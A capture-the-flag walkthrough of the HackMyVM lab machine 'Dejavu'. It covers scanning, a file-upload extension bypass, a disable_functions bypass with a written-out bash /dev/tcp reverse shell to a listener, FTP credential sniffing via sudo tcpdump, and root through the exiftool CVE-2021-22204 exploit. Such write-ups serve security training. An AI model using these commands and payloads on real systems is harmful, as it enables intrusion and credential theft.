Writeup – HackMyVM’s Dejavu Walkthrough
Dejavu is an easy machine from HackMyVM by the user InfayerTS. The machine includes basic vulnerabilities. First of all, we find a path from a page’s source. Then, we have a file upload area that misses an extension to filter out. Similarly, we also have a directory for the uploads. However, there are restrictions to certain functions making it difficult to get a reverse shell. “Writeup – HackMyVM’s Dejavu Walkthrough”
Step 1: Get the IP address
As always, I started the enumeration by identifying the IP address of the target machine.
❯ sudo netdiscover -r 10.0.0.0/24
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.0.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.0.3 08:00:27:0e:4f:55 1 60 PCS Systemtechnik GmbH
10.0.0.152 08:00:27:3b:66:78 1 60 PCS Systemtechnik GmbHHere, the IP address of the target is 10.0.0.152 whereas that of the attacker is 10.0.0.4 (not shown here).
Step 2: Scan services on the target
Next, I scanned the services on the target that we can access from the network.
❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-28 22:36 +0545
Nmap scan report for 10.0.0.152
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
| 256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_ 256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThe SSH banner shows that the operating system is Ubuntu 20.04 (Focal) (https://packages.ubuntu.com/focal-updates/ssh). Likewise, we have an HTTP port to enumerate further.
Step 3: Dig into the HTTP webserver
The first page of the server only contains the Apache default server. Thus, I performed directory busting.
❯ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.0.152/ -o common.log
/.hta (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/index.html (Status: 200) [Size: 10918]
/info.php (Status: 200) [Size: 69927]
/server-status (Status: 403) [Size: 275]This cursory scan exposed the presence of a PHP info file. In that file, we see that some functions are disabled.
It is essential after some time. However, for now, the source of the page reveals a path.
<html>
<body>
<!-- /S3cR3t -->
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
<!------------- redacted -------------->The path “/S3cR3t” has a vulnerability that allows us to explore the directory contents.
Now, the first hurdle is to identify the extension that allows script execution. “.phtml” extension does the job.
Reference: https://book.hacktricks.xyz/pentesting-web/file-upload#file-upload-general-methodology
Since the functions to spawn shells are denied, we cannot directly spawn one. However, there are ways to bypass it. At this point, I am going to use a simple exploit with the tool Chankro. But the problem is that the project is not maintained for long and there is no python3 version of it. Thus,
https://www.tarlogic.com/blog/how-to-bypass-disable_functions-and-open_basedir/
Please check the above links for the details. However, here, we can use the “mail” function because it’s allowed.
The link to the script is: https://github.com/kriss-u/chankro-py3
For the exploit, I created a simple reverse shell file.
bash -c 'bash -i >& /dev/tcp/10.0.0.4/9001 0>&1'The next stuff is to run the script. But we should notice that the document root is “/var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats”.
❯ python3 chankro.py --arch 64 --input rev.sh --output shell.phtml --path /var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats/S3cR3t/files/
-=[ Chankro ]=-
-={ @TheXC3LL }=-
[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: shell.phtml
[+] File created!It creates a file that spawns a reverse shell. Here, in my case, it is port 9001.
❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001That’s all we need. Now, we have to upload the output file and open the link. It gets us a shell.
❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.152.
Ncat: Connection from 10.0.0.152:36554.
bash: cannot set terminal process group (747): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$Lastly, I upgraded this dumb shell to a proper one.
Upgrade to an intelligent reverse shell
Step 4: Sudo abuse tcpdump
Once we get the shell, we have to check the sudo permissions.
www-data@dejavu:/$ sudo -l
Matching Defaults entries for www-data on dejavu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on dejavu:
(robert) NOPASSWD: /usr/sbin/tcpdumpFrom the screenshot above, we can say that we can access tcpdump as the user robert. After this, I checked the gtfobins but it didn’t give me any shell at all.
Reference: https://gtfobins.github.io/gtfobins/tcpdump/#sudo
The next thing to do was to listen to the traffic. So, to be certain, I used pspy64 to snoop the processes. Then, I noticed that it would log in to the FTP server every few duration.
2022/05/29 05:48:01 CMD: UID=1000 PID=11992 | /bin/sh -c /home/robert/auth.sh
2022/05/29 05:48:01 CMD: UID=1000 PID=11994 | ftp -n localhost
2022/05/29 05:48:01 CMD: UID=1000 PID=11993 | /bin/sh /home/robert/auth.sh
2022/05/29 05:48:01 CMD: UID=65534 PID=11996 | /usr/sbin/vsftpd /etc/vsftpd.conf
2022/05/29 05:48:01 CMD: UID=0 PID=11995 | /usr/sbin/vsftpd /etc/vsftpd.conf Thus, I knew which port to listen to. Also, we have to listen to the loopback interface. After some time, we get a handshake.
www-data@dejavu:/tmp$ sudo -u robert tcpdump -i lo port ftp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
# Redacted
05:52:01.840340 IP localhost.60932 > localhost.ftp: Flags [P.], seq 1:14, ack 21, win 512, options [nop,nop,TS val 2022967189 ecr 2022967189], length 13: FTP: USER robert
05:52:01.840546 IP localhost.ftp > localhost.60932: Flags [.], ack 14, win 512, options [nop,nop,TS val 2022967190 ecr 2022967189], length 0
05:52:01.841224 IP localhost.ftp > localhost.60932: Flags [P.], seq 21:55, ack 14, win 512, options [nop,nop,TS val 2022967190 ecr 2022967189], length 34: FTP: 331 Please specify the password.
05:52:01.841237 IP localhost.60932 > localhost.ftp: Flags [.], ack 55, win 512, options [nop,nop,TS val 2022967190 ecr 2022967190], length 0
05:52:01.841636 IP localhost.60932 > localhost.ftp: Flags [P.], seq 14:32, ack 55, win 512, options [nop,nop,TS val 2022967191 ecr 2022967190], length 18: FTP: PASS #Password redacted
05:52:01.842203 IP localhost.ftp > localhost.60932: Flags [.], ack 32, win 512, options [nop,nop,TS val 2022967191 ecr 2022967191], length 0
05:52:01.870378 IP localhost.ftp > localhost.60932: Flags [P.], seq 55:78, ack 32, win 512, options [nop,nop,TS val 2022967219 ecr 2022967191], length 23: FTP: 230 Login successful.
# Redacted everythingThe password gives the SSH shell for the user robert.
Escalate to root
The sudo permissions show that the user can execute exiftool as root. As the name suggests, the binary suffers from an exploit with “djvu” modules.
Reference: https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
Also, the version of the binary is 12.23 and it is vulnerable.
robert@dejavu:/tmp$ exiftool -ver
12.23The link to the exploits: https://github.com/convisolabs/CVE-2021-22204-exiftool
Cloning into 'CVE-2021-22204-exiftool'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 27 (delta 6), reused 17 (delta 2), pack-reused 0
Unpacking objects: 100% (27/27), 52.51 KiB | 363.00 KiB/s, done.
robert@dejavu:/tmp$ cd CVE-2021-22204-exiftool/
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ ls
configfile exploit.py image.jpg lab README.md
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ vim exploit.py
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ python3 exploit.py
1 image files updated
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ ls
configfile exploit.djvu exploit.py image.jpg image.jpg_original lab payload payload.bzz README.md
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ sudo exiftool exploit.djvuThe main thing is that we have to update the IP address and the port as desired. This gave us the shell of the root.
❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.152.
Ncat: Connection from 10.0.0.152:60938.
# id
uid=0(root) gid=0(root) groups=0(root)
#